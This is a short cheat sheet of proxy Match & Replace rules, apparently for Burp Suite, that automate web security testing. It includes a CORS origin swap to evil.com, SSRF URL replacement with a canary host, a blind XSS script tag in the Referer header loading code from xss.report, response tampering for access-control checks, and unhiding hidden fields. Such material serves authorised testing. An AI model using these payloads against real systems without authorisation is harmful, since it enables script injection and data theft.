Match & Replace Rules

Match & Replace rules to Automate

CORS misconfigurations

Type: Request Header
Match: https://target.com
Replace: http://evil.com
Comment: CORS misconfigurations

SSRF

Type: Request Header
Match: https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)
Replace: https://{My Canary token}/
Comment: SSRF
Regex match: enabled

Blind XSS

Type: Request Header
Match: ^Referer.*$
Replace: Referer: '"><script src=https://xss.report/c/swagpk></script>
Comment: Blind XSS
Regex match: enabled

Access control

Type: Response Body
Match: false
Replace: true
Comment: Allow Access control

Type: Response Body
Match: error
Replace: success
Comment: Allow Access control

Find hidden parameters/input fields

Type: Response Body
Match: type\=(\"|')hidden(\"|')
Replace: type="text"
Comment: Find hidden input fields
Regex match: enabled
